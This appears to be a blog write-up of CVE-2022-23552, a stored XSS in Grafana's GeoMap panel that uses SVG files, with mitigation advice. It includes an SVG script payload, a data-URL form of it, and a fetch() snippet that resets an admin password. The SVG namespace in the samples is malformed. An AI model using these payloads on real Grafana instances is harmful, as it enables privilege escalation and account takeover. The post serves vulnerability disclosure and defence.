CVE CyberSecurity Database News

CVE-2022-23552 - How a Grafana GeoMap Stored XSS Could Let Attackers Jump Privileges

Poster -

Grafana is one of the most popular open-source platforms for monitoring, dashboarding, and observability. System admins and DevOps pros everywhere use it to visualize infrastructure, application, and business metrics. But, just like every powerful tool, it’s not immune to vulnerabilities.

In this post, I’ll walk you through CVE-2022-23552—a stored cross-site scripting (XSS) bug in Grafana’s GeoMap panel plugin. I’ll show you how the bug worked, what made it possible, and how attackers could use it to escalate their privileges thanks to unsanitized SVG files. There will be code snippets, attack scenarios, links for original references, and tips to keep your Grafana safe!

Affected Versions: 8.1. up to (but not including) 8.5.16, 9.2.10, and 9.3.4

- Impact: Users with the Editor role could inject malicious JavaScript payloads using SVG files, potentially escalating privileges.

What's GeoMap?

GeoMap is a built-in panel that displays data on maps (like showing servers’ locations).

How Did It Work? (In Simple Terms)

SVG images are basically XML text files for vector graphics, but they can also include JavaScript using <script> tags. In this Grafana bug, there was no proper sanitization of SVG files loaded in GeoMap panels. This let users with Editor rights add SVG files that embedded arbitrary JavaScript.

Whenever an Admin (or ANY other user with high privilege) *viewed* the dashboard containing these widgets, their browser unwittingly ran the attacker’s JavaScript—right in their current session.

Attack Flow (Step by Step)

1. Malicious SVG: An attacker (user with Editor rights) creates an SVG file containing JavaScript payload.
2. Upload or Reference: They upload the SVG somewhere externally (like their own server) OR use a data URL to embed it directly.
3. Panel Setting: The attacker sets the GeoMap background (or icon) to load the malicious SVG file—in the dashboard’s panel configuration.
4. Trigger: An Admin user visits or edits the dashboard. The malicious JS executes in their browser.
5. Privilege Escalation: Attack code can switch the admin’s password, hijack the session, or act as the Admin.

Here’s what a minimal SVG with embedded JavaScript looks like

<svg xmlns="http://www.w3.org/200/svg">;
  <script>
    alert('XSS in Grafana!');
    // Malicious code could steal cookies, perform actions as current user, etc.
  </script>
</svg>

You can save that SVG somewhere accessible by Grafana (like an S3 bucket, or even encode it as base64 in a data URL).

You can point the GeoMap to this image, for example, using the data URL

data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/200/svg">;<script>alert('XSS in Grafana!')</script></svg>

Save the panel

When an Admin opens the dashboard, the script inside the SVG runs!

What Can Attackers Actually Do?

- Vertical Privilege Escalation: If the Admin’s browser executes the attacker’s JS, it runs with the Admin’s credentials.
- Change Admin’s Password: The code could call Grafana APIs to reset or set a known password for the Admin.
- Steal Session/Cookies: Not likely with Secure/HttpOnly cookies, but sometimes possible with misconfigs.

Realistic Exploit: Changing an Admin's Password

Here’s a *pseudo-code* snippet for a payload that could set the Admin’s password to “hacked” (details depend on the endpoint, but this is the rough idea):

fetch('/api/admin/users/1/password', {
  method: 'PUT',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    password: 'hacked'
  }),
  credentials: 'include'
})
.then(resp => resp.json())
.then(console.log)

You could embed this in the SVG <script> block, possibly obfuscated to avoid casual detection.

Upgrade Immediately! Move to Grafana 8.5.16, 9.2.10, 9.3.4 or newer.

- Review User Roles: Minimize Editor access—don’t give it to users who don’t strictly need it!

Restrict External SVG support: Block SVG usage where possible in dashboards.

- Monitor For Unusual Panel Configs: Be suspicious if you see data URLs or external SVGs you didn’t create.

References

- Original Grafana Security Advisory
- NVD Details for CVE-2022-23552
- Grafana GeoMap Panel Docs

Summary

CVE-2022-23552 shows why even trusted platforms can be vulnerable with the right attack path. It takes just one overlooked content type (like SVG) to open doors for privilege escalation. If your company or your personal projects use Grafana, make sure you’re up-to-date and review who has Editor access—sometimes internal threats are just as real as external attackers!

If you want to test if your version is safe: try creating a test dashboard with an SVG (like above) and check if the JS runs. No pop-up? Good! Still, always use the latest releases and keep an eye on advisories.

Have questions or stories about securing Grafana? Drop them below!

Timeline

Published on: 01/27/2023 23:15:00 UTC
Last modified on: 02/07/2023 19:57:00 UTC